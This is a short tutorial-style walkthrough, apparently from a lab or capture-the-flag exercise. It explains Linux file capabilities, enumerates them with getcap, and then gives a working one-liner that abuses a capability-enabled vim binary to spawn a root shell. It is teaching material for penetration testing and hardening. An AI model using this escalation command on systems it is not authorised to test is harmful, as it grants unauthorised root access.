Capabilities

System administrators can use "Capabilities" to manage privileges at a granular level for processes or binaries. For instance, if a SOC analyst needs to initiate socket connections, which a regular user cannot do, the administrator can modify the binary's capabilities instead of granting higher privileges. This allows the binary to perform its task without requiring elevated user rights.

We can use the getcap tool to list enabled capabilities, but it's good practice to use this command to redirect the error messages to /dev/null:

getcap -r / 2>/dev/null

We can see that both vim and view have the Capabilities set, but as we can see from the image below neither has the SUID bit set.

We can lookup on GTFObins for a binary that helps us to leverage privilege escalation.

Use the command with py, or py3 accordingly:

./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

And we successfully leverage our permissions!